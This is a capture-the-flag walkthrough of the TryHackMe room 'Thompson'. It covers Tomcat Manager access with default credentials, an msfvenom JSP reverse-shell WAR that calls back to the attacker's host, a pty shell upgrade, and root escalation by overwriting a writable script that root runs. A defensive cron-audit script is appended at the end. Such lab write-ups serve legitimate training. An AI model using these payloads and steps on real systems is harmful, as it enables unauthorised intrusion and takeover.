CatSec.org

Thompson

In this post, we will look into the room “Thompson” from TryHackMe, which can be found at https://tryhackme.com.

Let’s run a port scan:

nmap -sV -A $IP

Options:

-A – aggressive scan – enables OS detection, version detection, default script scanning and traceroute in one go, so you get a quicker picture of which services on the host are worth a closer look.

-sV – version detection – identifies the version of each running service, which is what you look up known vulnerabilities against.

The output looks like this:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 07:27 EDT
Nmap scan report for 10.10.60.241
Host is up (0.055s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that the box is running Apache Tomcat 8.5.5 on port 8080 (plus the AJP connector on 8009 and SSH on 22). Now let’s open port 8080 in our web browser:

The default page for Tomcat… Hmm, let’s try to log in to the “Manager App” using the default Tomcat credentials a quick Google search turns up. Once we are in and scroll down, there is an upload form for WAR files. Let’s use msfvenom to create a payload and upload it:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=4444 -f war > shell.war

Options:

-p – the payload to generate

-f – output format (here a WAR archive, so Tomcat will deploy it)

Now we can use Metasploit to start a reverse TCP handler on port 4444 and wait for the shell:

Let’s upload the file through the Manager App. The deployed application now appears in the application list. Click it and the handler should catch a reverse shell on your attacking box:

We can use Python to upgrade this to a proper TTY shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Now we can head into /home/jack and cat out user.txt. For root, “sudo -l” is no help because we don’t know the tomcat user’s password, so let’s look at what else is in the home directory. There are three files:

Let’s open test.txt. It contains the output of id for root, so the script that writes it is evidently being executed as root. If we check id.sh there is an interesting script:

#!/bin/bash
id > test.txt

Since id.sh is writable by us, we can use echo to replace its contents with a command of our own:

echo "cat /root/root.txt > test.txt" > id.sh

*Don’t forget to use a single “>”: with “>>” you would append instead of overwriting the existing content of id.sh.*

We can cat id.sh to check that the change went in. Okay, perfect. Once the script has been executed again, cat “test.txt” and we get the root flag. Great.
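As an added defender-side example (not code from the original walkthrough), here is a small audit script for the misconfiguration exploited above: a script executed by root that a low-privilege user can write to. It assumes the root job is a crontab entry, which the room does not show, and the crontab and scripts it checks are constructed samples in a temporary directory.

```shell
#!/bin/sh
# Added audit example, not code from the original walkthrough. It flags
# crontab entries whose script is writable by group or other, i.e. a file a
# low-privilege user could rewrite the way id.sh was rewritten above.
# Assumption: the root job is a crontab entry (the room does not show the
# mechanism); the crontab and scripts below are constructed samples.

# audit_cron_scripts <crontab-file>
# Reads a system-crontab-format file (min hour dom mon dow user command)
# and prints the path of every script that has a group- or other-write bit.
audit_cron_scripts() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r _ _ _ _ _ _ cmd; do
        script=${cmd%% *}              # first word of the command = script path
        [ -f "$script" ] || continue   # skip commands that are not a plain file
        if [ -n "$(find "$script" \( -perm -g+w -o -perm -o+w \) -print)" ]; then
            printf '%s\n' "$script"
        fi
    done
}

# Constructed demo: one script left world-writable, one with safe permissions.
demo_dir=$(mktemp -d)
printf '#!/bin/bash\nid > test.txt\n' > "$demo_dir/id.sh"
printf '#!/bin/bash\nlogrotate /etc/logrotate.conf\n' > "$demo_dir/rotate.sh"
chmod 777 "$demo_dir/id.sh"        # the weak setting that enables the escalation
chmod 755 "$demo_dir/rotate.sh"    # the corrected setting: only the owner may write
cat > "$demo_dir/crontab" <<EOF
# m h dom mon dow user command
* * * * * root $demo_dir/id.sh
0 3 * * * root $demo_dir/rotate.sh
EOF

audit_cron_scripts "$demo_dir/crontab"   # prints only .../id.sh
```

On a real host, point it at /etc/crontab and the files under /etc/cron.d; a clean run prints nothing.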